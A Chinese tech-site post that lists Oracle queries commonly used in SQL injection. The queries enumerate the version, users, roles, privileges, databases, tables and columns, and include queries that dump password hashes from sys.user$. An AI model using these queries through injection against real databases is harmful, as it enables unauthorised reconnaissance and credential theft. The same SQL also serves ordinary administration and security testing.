溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Oracle SQL注入常用語(yǔ)句

發(fā)布時(shí)間:2020-07-28 03:17:15 來(lái)源:網(wǎng)絡(luò) 閱讀:2755 作者:fatshi 欄目:MySQL數(shù)據(jù)庫(kù)

解析IP
select utl_inaddr.get_host_address('google.com') from dual;

獲取本機(jī)IP地址
select utl_inaddr.get_host_address from dual;

根據(jù)IP地址反向解析主機(jī)名
select utl_inaddr.get_host_name('10.80.18.241') from dual;

-- list version
select banner from v$version where rownum=1 ; -- oracle version

-- list user
select user from dual; -- current user
select username from user_users; -- current user
select username from all_users; -- all user , the current user can see...
select username from dba_users; -- all user , need pris

-- list role
select role from session_roles; -- current role

-- list privs
select privilege from user_sys_privs; -- privs the current user has
select privilege from role_sys_privs; -- privs the current role has
select privilege from session_privs; -- the all privs that current user has = user_sys_privs + role_sys_privs
select * from dba_sys_privs; -- all user's privs , need privs

-- list password hash
select name, password, astatus from sys.user$; -- password hash <=10g , need privs
select name, password, spare4 from sys.user$; -- password has 11g , need privs

-- list database
select global_name from global_name; -- current database
select sys.database_name from dual; -- current database
select name from v$database; -- current database name , need privs
select instance_name from v$instance; -- current database name , need privs

-- list schemas
select distinct owner from all_tables; -- all schema

-- list tables
select table_name from all_tables where owner='xxx'; -- all table name

-- list columns
select owner,table_name,column_name from all_tab_columns where table_name='xxx';
select owner,table_name,column_name from all_tab_cols where table_name='xxx';

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI